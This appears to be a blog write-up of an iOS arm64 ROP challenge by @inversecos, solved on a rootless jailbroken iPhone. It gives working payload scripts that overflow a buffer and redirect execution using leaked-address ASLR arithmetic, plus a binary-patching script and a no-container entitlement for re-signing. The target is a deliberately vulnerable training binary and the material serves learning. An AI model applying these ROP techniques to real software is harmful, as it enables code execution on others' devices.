@inversecos iOS rop chain

Some help on a ROP challenge published by @inversecos #

tldr: arm, python3 and rootless jailbreak, how do I start? #

Here are the assumptions I made when I started:

  • Focus on ARM-related challenges as it’s the most relevant arch nowadays

  • Why would I use python2 when it’s end of life?

  • rootful/rootless? What’s that? I have root privileges on this iPhone

I tried @inversecos’s ROP challenge on a rootless jailbroken iPhone

Let’s go through my mistakes and how to get started faster

  • Let’s address rootful vs rootless jailbreaks: the distinction has nothing to do with root privileges but with where the jailbreak can write. A rootful jailbreak makes the root filesystem writable; a rootless one leaves / untouched and installs its tools in a writable location under /var (typically /var/jb). What are the implications for this challenge? On a rootless device /bin is almost empty: there is no uname there, so a chain that ends up executing /bin/uname has nothing to run, and there is no ROP to enjoy unless you find a workaround.

  • Let’s address the python3 issues for low-level work (a script will help you a lot more than echoing bytes by hand): in python3 a string literal is Unicode text, so "\xff" is the character U+00FF and print() encodes it to UTF-8 as two bytes. Raw payload bytes have to be bytes objects (b"...") written through sys.stdout.buffer. This great video from @liveoverflow explains it: https://www.youtube.com/watch?v=FxNS-zSS7MQ

Without relying on external packages (pwntools etc) this can be a simple way to solve the challenge

If the binary gets killed on launch, re-sign it with the following entitlements (saved in a file called ent.xml) using ldid -Sent.xml ./dontpopme

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
        "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>com.apple.private.security.no-container</key>
	<true/>
</dict>
</plist>

./dontpopme

Get the “leaked” address and do some math as explained on @inversecos’s blog post

#!/usr/bin/env python3
import struct
import sys

# Both addresses change on every run (ASLR), so fill them in from the leak
# each time; the values below are the example ones from this post.
padding = b"A" * 37                        # fill the buffer up to the first overwritten pointer
change = struct.pack("<Q", 0x1049c3c50)    # address of change(), i.e. b"\x50\x3c\x9c\x04\x01\x00\x00\x00"
junk = b"\xff" * 8                         # 8 bytes of filler between the two pointers
run = struct.pack("<Q", 0x1049c3c88)       # address of run(), i.e. b"\x88\x3c\x9c\x04\x01\x00\x00\x00"
payload = padding + change + junk + run
sys.stdout.buffer.write(payload)           # write raw bytes, never print() a str, on python3

./pwnpop.py > resume.txt

Enjoy uname being run
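The same payload, but built from the leaked address instead of hardcoding the two pointers, as an added example that is not the post’s pwnpop.py. The unslid addresses (LEAK_VADDR, CHANGE_VADDR, RUN_VADDR) are hypothetical: read the real ones for the leaked symbol, change() and run() from the binary (for example with nm or otool -tV) and keep the arithmetic. It also shows the python3 str-vs-bytes pitfall from the point above and refuses a leak that does not produce a page-aligned slide, which is the usual sign that the wrong symbol or offset was used.

```python
#!/usr/bin/env python3
"""Build the dontpopme payload from the leaked address.

Added example, not the original pwnpop.py. The unslid Mach-O addresses
below are hypothetical placeholders for the real ones read from the binary.
"""
import struct
import sys

# Hypothetical unslid Mach-O addresses (main image base 0x100000000).
LEAK_VADDR = 0x100003C40      # the symbol whose runtime address the binary leaks
CHANGE_VADDR = 0x100003C50    # change()
RUN_VADDR = 0x100003C88       # run(), which ends up executing /bin/uname
PADDING_LEN = 37              # bytes before the first overwritten pointer (from the post)
PAGE_SIZE = 0x4000            # arm64 iOS uses 16 KiB pages, so the ASLR slide is 16 KiB-aligned


def slide_from_leak(leak):
    """ASLR slide = runtime address of a known symbol minus its unslid address."""
    slide = leak - LEAK_VADDR
    if slide < 0 or slide % PAGE_SIZE:
        # A misaligned slide means the leak or LEAK_VADDR is wrong: fail early
        # instead of emitting a payload that just crashes the target.
        raise ValueError("leak 0x%x does not look like a slid %#x" % (leak, LEAK_VADDR))
    return slide


def p64(value):
    """Pack a 64-bit little-endian pointer (arm64 is little-endian)."""
    return struct.pack("<Q", value)


def build_payload(leak):
    """padding | &change | 8 bytes of filler | &run, the layout of the post's pwnpop.py."""
    slide = slide_from_leak(leak)
    return (b"A" * PADDING_LEN
            + p64(CHANGE_VADDR + slide)
            + b"\xff" * 8
            + p64(RUN_VADDR + slide))


def str_vs_bytes():
    """python3 pitfall: a str escape like \\xff is the character U+00FF, so
    encoding it (which print() does) yields two bytes; b"\\xff" is one byte."""
    return "\xff".encode(), b"\xff"


if __name__ == "__main__":
    # Usage: ./buildpop.py 0x1049c3c40 > resume.txt (default is the post's example leak)
    leak = int(sys.argv[1], 16) if len(sys.argv) > 1 else 0x1049C3C40
    sys.stdout.buffer.write(build_payload(leak))   # raw bytes, never print()
```

With the hypothetical addresses and the post’s example leak 0x1049c3c40 the slide is 0x49c0000 and the two pointers come out as the example values shown earlier; the script is only useful once the three VADDR constants are replaced with the real ones.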

If you’re on a rootless jailbreak you can manually patch the binary and replace the /bin/uname string with /bin/ps (it is shorter, so it fits in the same slot; keep the terminating NUL and re-sign the binary afterwards since the patch invalidates its code signature), or use theos to recompile the challenge
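The in-place string patch, as an added example that is not part of the post or the challenge: it replaces every NUL-terminated /bin/uname with /bin/ps, NUL-pads the rest of the slot so nothing else in the file moves, and refuses a replacement that would overrun the slot. The sample bytes it runs on stand-alone are a constructed stand-in for the binary, not the real dontpopme; after patching the real file it still has to be re-signed with ldid -Sent.xml as above.

```python
#!/usr/bin/env python3
"""Swap the /bin/uname string in the challenge binary for /bin/ps.

Added example (not from the post or the challenge). Patching invalidates
the code signature, so re-sign the output with ldid afterwards.
"""
import sys

OLD = b"/bin/uname\x00"
NEW = b"/bin/ps\x00"


def patch_path(blob, old=OLD, new=NEW):
    """Replace every NUL-terminated `old` with `new` without changing any offset.

    The replacement must fit in the original slot; the remaining bytes are
    NUL-padded so every other string and pointer in the binary stays where
    it was. Returns (patched_bytes, number_of_replacements).
    """
    if len(new) > len(old):
        raise ValueError("%r is longer than %r and would overrun the slot" % (new, old))
    padded = new.ljust(len(old), b"\x00")
    return blob.replace(old, padded), blob.count(old)


# Constructed stand-in for the binary (Mach-O 64 magic plus a tiny string
# table); only the presence of the /bin/uname string matters here.
SAMPLE_BINARY = (b"\xcf\xfa\xed\xfe" + b"\x00" * 16
                 + b"Enter name: \x00/bin/uname\x00done\x00")


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: patchpath.py <in-binary> <out-binary>")
    with open(sys.argv[1], "rb") as f:
        patched, n = patch_path(f.read())
    if n == 0:
        sys.exit("string %r not found, nothing patched" % OLD)
    with open(sys.argv[2], "wb") as f:
        f.write(patched)
    print("replaced %d occurrence(s); now re-sign: ldid -Sent.xml %s" % (n, sys.argv[2]))
```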

Thoughts #

As much as this is an easy challenge in hindsight, going from having done zero pwn challenges on standard and documented environments (Linux x86) left me with too many things to grasp at once, baby steps recommended!
Still, it brought me to read about theos, PAC and lots of other cool stuff!